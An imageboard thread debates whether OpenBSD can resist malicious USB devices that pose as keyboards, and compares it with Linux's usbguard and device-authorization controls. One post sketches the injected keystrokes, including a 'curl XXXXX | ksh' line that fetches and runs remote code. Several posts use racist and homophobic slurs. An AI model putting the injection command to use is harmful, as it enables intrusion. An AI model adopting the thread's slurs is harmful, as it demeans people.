can OpenBSD be made secure?

>inserts USB pendrive
>gets hacked
attack from 2014
used in the wild ever since
OpenBSD unfixed

inbout seething morons:
>UH IT'S PHYSICAL ACCESS
no you dimwitted mutt, it's not

It's All Fucked Shirt $22.14

Yakub: World's Greatest Dad Shirt $21.68

It's All Fucked Shirt $22.14

  1. 3 weeks ago
    Anonymous

    Linux fixed it with usbguard

    But BSD lacks the /proc/...authorized_default and authorized
    BSD is wide open.

    >hurrr physical access
    it's as bad as if your computer would get hacked from inserting an DVD or floppy disk.
    imagine being as bad as windows idiots who auto run the autorun.ini on DVD.
    >os focused on security
    apparently not

  2. 3 weeks ago
    Anonymous

    is there a solution for this problem?

    • 3 weeks ago
      Anonymous

      glue up your usb ports

    • 3 weeks ago
      Anonymous

      bios locks and bios option to disable usb

  3. 3 weeks ago
    Anonymous

    if you are able to insert a usb stick into a machine running openbsd you are also able to just reboot it into single user mode which does not ask for a password, so if you are bothering with using a usb stick at that point you're basically a moronic Black person, and a homosexual.

  4. 3 weeks ago
    Anonymous

    This is the dumbest fricking thread I've seen in a while, and that's counting all the AI garbage in the catalog.

    • 3 weeks ago
      Anonymous

      What about the discord threads?

  5. 3 weeks ago
    Anonymous

    >>UH IT'S PHYSICAL ACCESS
    >no you dimwitted mutt, it's not
    Why not? Why are you even plugging in random flash drives to begin with?

  6. 3 weeks ago
    Anonymous

    somehow IQfy blocks me from replying to this thread with some details, and then IP bans (is it expired now, if you are reading this text then it expired or something).

    broken spam detection?

    • 3 weeks ago
      Anonymous

      Just post a screenshot of the post you're trying to make.

      • 3 weeks ago
        Anonymous

        >Just post a screenshot of the post you're trying to make.
        come to think of it, it probably seethes at the URL with word hack in it.

        let's see:

        *inserts USB pendrive*
        USB: hi, I self-identify as a keyboard.
        kernel: you do? LOL OK I will give you full access as input device, LAMAO
        USB: <ctrl><f2>xterm<enter>curl XXXXX | ksh<ENTER>exit<ENTER>
        >w-what?? did a terminal window just flashed for a second, wtf??
        >...WTF why I am locked out of this machine? reeeee reeeeeeeeee

        is there a solution for this problem?

        >is there a solution for this problem?
        OpenBSD needs to add an API that makes USB blocked by default, and allows to investigate USB interface/class, and then decide to allow it or keep it blocked.

        Linux does it as above, usbguard + /proc/...authorized

        • 3 weeks ago
          Anonymous

          How does that protect against a device presenting itself as something it's not? Or even that it is, but then behaves maliciously

        • 3 weeks ago
          Anonymous

          Okay, that's bad. But hear me out. What if I just locked my windows and doors on my house when I'm gone and didn't plug in random USB sticks from the sidewalk?

        • 3 weeks ago
          Anonymous

          >Login incorrect

    • 3 weeks ago
      Anonymous

      >somehow IQfy
      i am pretty sure that iamgeboard share hte same backend of 4chinz
      >b&
      it is just dynamic IP stuff, some guy had gotten banned in your area years ago

  7. 3 weeks ago
    Anonymous

    Interesting... do distros implement usbguard by default?

    • 3 weeks ago
      Anonymous

      I hope not, the project looks abandoned. There are 100+ open issues and the last version of usbguard came in 2022.

      • 3 weeks ago
        Anonymous

        >I hope not, the project looks abandoned.
        >the program to parse rules like "if device is storage then allow ; if keyboard then deny unless in usb port 1.2" needs UPDOOOOTS every 2 months!
        >update to version 2024-covid24-omicron-boosted4 today!! don't forget to buy season pass and new DLCs
        lol no

        >people want 100000 things done for them to extend the project
        not my problem

        • 3 weeks ago
          Anonymous

          >irrelevant nonsense
          If it's such an important tool, it shouldn't have bug reports open for 2 years without addressing them.

    • 3 weeks ago
      Anonymous

      >Interesting... do distros implement usbguard by default?
      Most distros probably do have the program usbgurad,
      but even if not - then all Linuxes have the /proc/ entires needed, you can go in with "cd" when see devnum/busnum files and do lsusb -D .... on device, check the class/interface of this device
      and then echo 1 > authorized

      you must echo 0 > authorized_default in /proc/ first

      be careful to not lock yourself out of the actual keyboard if it's on USB (you can't replug it)
      settings go away on reboot

      I do not know of distros that enable this by default. but would be nice to have it.

      on OpenBSD the kernel seems to lack any mechanism to build such protection at all.

      >How does that protect against a device presenting itself as something it's not? Or even that it is, but then behaves maliciously

      the usb class/interface determines what kernel allows device to do.
      only devices of classes like HID will be detected (by something.. udev? kernel? dunno) and attached as the keyboard/mouse inputs.

      device can't change class/interface in the middle, it would need to logically "disconnect" and "connect" again at which point it again is NOT authorized if authorized_default is 0.

      usbguard is a daemon (+gui client) that checks new devices and checks rules for black/white list

  8. 3 weeks ago
    Anonymous

    epoxy in usb ports

    • 3 weeks ago
      Anonymous

      >epoxy in usb ports
      fricking IDIOT.
      he doesn't understand the attack - it's YOUR GOAL to read data from usb pendrive, or use usb wifi, or use usb dvd reader, so you can't expoxy it

      • 3 weeks ago
        Anonymous

        i dont care about usb so works for me

      • 3 weeks ago
        Anonymous

        If it's my goal to insert random usb device in random port, then that's my goal and the rules and manual authorization are also in the way.

        • 3 weeks ago
          Anonymous

          >OpenBSD is insecure unless you yourself built the USB device from semiconductors, or audited it's entire hardware and firmware

          i dont care about usb so works for me

          >i dont care about usb so works for me

          Okay, that's bad. But hear me out. What if I just locked my windows and doors on my house when I'm gone and didn't plug in random USB sticks from the sidewalk?

          >don't plug in USB

          OpenBSD users admit defeat.

          • 3 weeks ago
            Anonymous

            i use linux and have epoxied usb because usb is satan
            ubguard is another attack vector for me

          • 3 weeks ago
            Anonymous

            >>don't plug in USB
            I said don't plug in USB devices from the sidewalk or parking lot.

          • 3 weeks ago
            Anonymous

            >I said don't plug in USB devices from the sidewalk or parking lot.
            he thinks USB devices that are not aqcuired from parking lot can't be malware
            LOL>

          • 3 weeks ago
            Anonymous

            Show me an example of store bought flash drives coming pre-loaded with malware targeting OpenBSD.

          • 3 weeks ago
            Anonymous

            >ignore this attack on BSD
            >because no one uses BSD
            >therefore it is secure
            lol

  9. 3 weeks ago
    Anonymous

    cuck license

  10. 3 weeks ago
    Anonymous

    I use FreeBSD, how does this affect me?

    • 3 weeks ago
      Anonymous

      cute

  11. 3 weeks ago
    Anonymous

    why is everyone falling of blatant bait? is this board filled with redditors?

  12. 3 weeks ago
    Anonymous

    Don't electrically connect untrusted hardware to your computer ... How hard is it? Almost every computer is vulnerable to this "attack".

    > hello computer i am usb device
    > hello usb device
    > *shorts all 4 contacts for 420 miliseconds*
    > conputer has to reboot sorry
    > hello computer i am usb hub with keyboard and bootable mass storage
    > okay thank you user what do you want to typ...
    > f12, left, left, enter, down, down, down, enter, left, enter, enter, down, down, enter, down, f5, f5, enter, f10, enter
    > hello computer you are running code from the usb device the user just plugged in in privilege ring 0

    i don't think your beloved usbguard:
    * prevents short circuit of usb pins
    * works before computer is booted

    • 3 weeks ago
      Anonymous

      well precisely, it's not a pen drive, it's a gadget

      and the first thing you'd notice if you stuck it in was your computer rebooting, at which point you'd take it out

      attack wouldn't work if you turn off USB keyboard support in the BIOS on your old Thinkpad either, this shit is gay-tarded

    • 3 weeks ago
      Anonymous

      >insert mystery usb into computer
      >computer reboots and does weird shit
      >just sit there watching like a moron
      user error

      • 3 weeks ago
        Anonymous

        These attacks are realtime, it's not like you have some pajeet connecting over VNC to your PC trying to manually type in every command

    • 3 weeks ago
      Anonymous

      >* prevents short circuit of usb pins
      not hacking but just destroying computer. secrets are safe
      attack is not silent at all
      >* works before computer is booted
      plug things once OS is booted up

  13. 3 weeks ago
    Anonymous

    Every corner of the Internet is filled with glowBlack folk seething about and coping with OpenBSD. And they all use the same few talking points. It's easy to notice. It's salty.

    • 3 weeks ago
      Anonymous

      What points do they use? I just want to know if I somehow became a glowBlack person without my knowledge.

      • 3 weeks ago
        Anonymous

        not her but
        >threat model
        >memory safety
        >O(2**n) scheduler
        >hardware support
        >blowjob mascot

        • 3 weeks ago
          Anonymous

          Looks like I am safe then. I just complain about performance and Bluetooth.

          • 3 weeks ago
            Anonymous

            >Bluetooth
            hardware support

          • 3 weeks ago
            Anonymous

            Oh shit.

        • 3 weeks ago
          Anonymous

          But what if you chose something like Linux because of these reasons?
          Should, when someone says to use OpenBSD, you just say "no" and give no other reason?

  14. 3 weeks ago
    Anonymous

    >physical access to a serial bus line doesn't count as physical access
    You're moronic.

Your email address will not be published. Required fields are marked *